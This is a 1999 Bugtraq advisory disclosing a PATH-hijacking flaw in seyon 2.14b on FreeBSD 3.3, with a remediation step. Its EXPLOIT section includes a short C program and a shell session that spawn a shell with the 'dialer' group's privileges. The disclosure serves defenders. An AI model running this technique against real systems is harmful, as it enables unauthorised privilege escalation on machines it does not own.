Bugtraq mailing list archives
FreeBSD 3.3's seyon vulnerability
From: btellier () USA NET (Brock Tellier)
Date: Mon, 8 Nov 1999 20:50:38 MST
Greetings, In preparing for this advisory release, I checked for "seyon" vulnerabilities in the bugtraq archives. I found that the exploit I had developed had already been discussed in May 1997. However, this does not change the fact that the current version of FreeBSD still ships a vulnerable version with vulnerable privs. I believe this is still worth noting. Here is my advisory as it was to be published before the previous vulnerability came to light. OVERVIEW A vulnerability exists in seyon v2.14b which will allow any user to upgrade his or her privs to those with which seyon runs. BACKGROUND This advisory is based entierly off the work I've done on FreeBSD 3.3-RELEASE and seyon 2.14b which is included on the FreeBSD installation CD as an "additional package". When installed via sysinstall, seyon's permissions are sgid "dialer". Different versions of seyon and different packages of 2.14b may have different default permissions. DETAILS Upon startup, seyon executes the programs "seyon-emu" and "xterm". The paths to these programs are not absolute and are gotten from the users's $PATH. By adding a directory we have write access to in our $PATH and putting our own version of seyon-emu or xterm, we can make seyon run this program with egid dialer. EXPLOIT bash-2.03$ uname -a; id; ls -la `which seyon` FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh () highwing cdrom com:/usr/src/sys/compile/GENERIC i386 uid=1000(xnec) gid=1000(xnec) groups=1000(xnec) -rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon bash-2.03$ cat > seyonx.c void main () { setregid(getegid(), getegid()); system("/usr/local/bin/bash"); } bash-2.03$ gcc -o seyon-emu seyonx.c bash-2.03$ PATH=.:$PATH bash-2.03$ seyon bash-2.03$ id uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec) bash-2.03$ FIX Simply chmod 750 `which seyon` and add selected users to the "dialer" group. Brock Tellier UNIX Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions, (continued)
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Mark (Nov 08)
- Insecure handling of NetSol maintainer passwords jlewis () LEWIS ORG (Nov 08)
- flaw in dmesg under Solaris echo8 (Nov 09)
- Re: Insecure handling of NetSol maintainer passwords Jefferson Ogata (Nov 09)
- Re: Insecure handling of NetSol maintainer passwords pedward () WEBCOM COM (Nov 10)
- Re: Insecure handling of NetSol maintainer passwords Trevor Schroeder (Nov 10)
- networksolutions CRYPT-PW salt (was: Re: Insecure handling of NetSol maintainer passwords) Jefferson Ogata (Nov 10)
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Mark (Nov 08)
- [Cobalt] Security Advisory - cgiwrap Jeff Bilicki (Nov 09)
- Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Andy Helsby (Nov 09)
- Re: FreeBSD 3.3's seyon vulnerability Bill Fumerola (Nov 09)
- Re: IE4/5 "file://" buffer overflow Mikael Olsson (Nov 09)
- (no subject) Ejovi Nuwere (Nov 09)
- Remote DoS Attack in QVT/Term 'Plus' 4.2d FTP Server Vulnerability Ussr Labs (Nov 09)
- Multiples Remotes DoS Attacks in Artisoft XtraMail v1.11 Vulnerability Ussr Labs (Nov 10)